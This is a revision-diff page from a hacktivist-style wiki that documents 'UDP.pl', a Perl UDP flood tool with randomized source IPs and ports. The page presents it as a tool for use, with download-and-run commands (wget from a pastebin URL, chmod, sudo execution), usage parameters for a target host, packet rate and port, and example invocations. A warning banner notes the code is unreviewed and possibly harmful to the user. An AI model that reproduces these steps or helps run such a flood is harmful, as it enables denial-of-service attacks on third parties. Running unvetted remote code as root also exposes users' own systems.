UDP.pl: Difference between revisions
From /i/nsurgency W/i/ki
Jump to navigationJump to search
>Extrapolate m should only be marked as clean once a 3rd party has reviewed it...regardless of the fact that I wrote this myself |
>CrackRabbit https://raw.github.com/bibanon/Insurgency-Wiki/master/0-/U/D/P/UDP.2Epl.mediawiki |
||
(3 intermediate revisions by 2 users not shown) | |||
Line 1: | Line 1: | ||
{{ | {{NonCleanCode}} | ||
'''mt_pulse.pl''' is a [[Perl]] script which directs an UDP flood to an IP | '''mt_pulse.pl''' is a [[Perl]] script which directs an UDP flood to an IP | ||
Line 5: | Line 5: | ||
=HowTo= | =HowTo= | ||
$ wget http://pastebin. | $ wget http://pastebin.com/raw.php?i=yT2caM18 -o udpflood.pl ''#download'' | ||
$ chmod +x udpflood.pl ''#make executable'' | $ chmod +x udpflood.pl ''#make executable'' | ||
Line 14: | Line 14: | ||
UDP Flooder - Randomizes SourceIP/Port and Destination Port | UDP Flooder - Randomizes SourceIP/Port and Destination Port | ||
Usage: ./ | Usage: ./udpflood.pl <A> <B> [C] | ||
A: Number of Packets/sec (in kilobytes/sec -- set it around your max upload speed) | A: Number of Packets/sec (in kilobytes/sec -- set it around your max upload speed) | ||
(Starts to get CPU intensive when using >500KB/s...) | (Starts to get CPU intensive when using >500KB/s...) | ||
B: Target Host or IP Address | B: Target Host or IP Address | ||
C: Target Port (Not Required) | C: Target Port (Not Required) | ||
Ex: ./ | Ex: ./udpflood.pl 10 localhost -- to flood yourself @ 10kb/s on random ports | ||
Ex: ./ | Ex: ./udpflood.pl 100 192.168.1.1 123 -- to flood your default gateway @ 100kb/s on UDP port 123 | ||
=Download= | =Download= | ||
* [ | * [http://pastebin.com/yT2caM18 Pastebin] | ||
wget http://pastebin. | wget http://pastebin.com/raw.php?i=yT2caM18 -o udpflood.pl | ||
{{tools}} | {{tools}} | ||
[[Category:Tools]] | [[Category:Tools]] |
Latest revision as of 01:09, 27 May 2013
![]() |
Aww Snap! This does not pass Clean Code Standards. This software may be harmful to your computer. |
![]() |
mt_pulse.pl is a Perl script which directs an UDP flood to an IP
HowTo[edit]
$ wget http://pastebin.com/raw.php?i=yT2caM18 -o udpflood.pl #download
$ chmod +x udpflood.pl #make executable
$ sudo ./udpflood.pl #show help; must be run as root
Info[edit]
UDP Flooder - Randomizes SourceIP/Port and Destination Port Usage: ./udpflood.pl <A> [C] A: Number of Packets/sec (in kilobytes/sec -- set it around your max upload speed) (Starts to get CPU intensive when using >500KB/s...) B: Target Host or IP Address C: Target Port (Not Required) Ex: ./udpflood.pl 10 localhost -- to flood yourself @ 10kb/s on random ports Ex: ./udpflood.pl 100 192.168.1.1 123 -- to flood your default gateway @ 100kb/s on UDP port 123
Download[edit]
wget http://pastebin.com/raw.php?i=yT2caM18 -o udpflood.pl
![]() |
UDP.pl is part of a series on Tools. |